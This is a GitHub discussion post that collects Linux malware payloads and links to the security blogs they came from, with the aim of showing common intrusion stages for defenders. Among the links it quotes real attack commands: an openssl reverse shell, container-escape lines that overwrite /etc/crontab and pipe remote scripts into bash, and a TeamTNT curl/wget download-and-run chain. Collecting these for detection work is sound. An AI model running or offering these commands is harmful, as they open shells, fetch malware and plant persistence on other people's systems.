Collection of GNU/Linux malware payloads #1119
gustavo-iniguez-goya
started this conversation in
Show and tell
Replies: 0 comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
-
This is a collection of malware payloads, extracted from several security blogs. I'll update it from time to time, but if you have some more to share, post a comment and I'll update it.
Hopefully it'll help to understand the common stages of an intrussion: hack a service -> drop a file to /tmp/, /var/tmp, /dev/shm , ... -> open an outbound connection to remote url to download additional tools -> escalate privileges -> gain persistance
and suspicious behaviours:
https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot
https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware
https://www.cisa.gov/news-events/analysis-reports/ar23-209c
setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"
https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet
chroot, container escapes, use of gcc...
https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/
(multiple initial vectors, at the bottom of the post for more)
chroot /mnt /bin/sh -c 'if ! type curl >/dev/null; then apt-get install -y curl; apt-get install -y --reinstall curl; yum clean all; yum install -y curl; yum reinstall -y curl; fi; echo OdODKFfkfWOffmfqpPWkjdmMdnddd== | base64 -d - >/etc/crontab && echo OdODKFfkfWOffmfqpPWkjdmMdnddd== | base64 -d - >> /etc/crontab`
sh -c 'chroot /host; apt-get update; apt-get install -y curl bash wget; curl 1.2.3.4/dc.sh|bash'
sh -c 'chroot /host; apt-get update; apt-get install -y curl git g++ make bash wget; curl 1.2.3.4/k.sh|bash'
(ofuscated payload, url)
(no payload) infecting VSCode, downloading external resources:
https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
(use of docker image for cryptomining)
https://www.crowdstrike.com/blog/crowdstrike-discovers-first-ever-dero-cryptojacking-campaign-targeting-kubernetes/
(use of docker image for cryptomining)
https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/
https://www.crowdstrike.com/blog/new-docker-cryptojacking-attempts-detected-over-2021-holidays/
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i /tmp/TeamTNT root@127.0.0.1 "(curl http://1.2.3.4/s3f1015/c/a.sh||cd1 http://1.2.3.4/s3f1015/c/a.sh||wget -q -O- http://1.2.3.4/s3f1015/c/a.sh||wd1 -q -O- http://1.2.3.4/s3f1015/c/a.sh)|bash"
https://www.cadosecurity.com/blog/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks
https://www.cadosecurity.com/blog/migo-a-redis-miner-with-novel-system-weakening-techniques
https://www.cadosecurity.com/blog/redis-p2pinfect
attempt to bypass detections (by renaming wget, ...)
https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence
https://www.cadosecurity.com/blog/redis-miner-leverages-command-line-file-hosting-service
(generic wget/curl usage)
https://www.cadosecurity.com/blog/redis-miner-leverages-command-line-file-hosting-service
https://www.cadosecurity.com/blog/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack
https://www.cadosecurity.com/blog/previously-undiscovered-teamtnt-payload-recently-surfaced
log4shell:
https://www.cadosecurity.com/blog/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228
https://www.cadosecurity.com/blog/coinstomp-malware-family-targets-asian-cloud-service-providers
https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/
worpress plugin vuln, from LFI to RCE:
https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers
https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
https://sysdig.com/blog/malware-analysis-shellbot-sysdig/
https://redcanary.com/blog/rocke-cryptominer/
Beta Was this translation helpful? Give feedback.
All reactions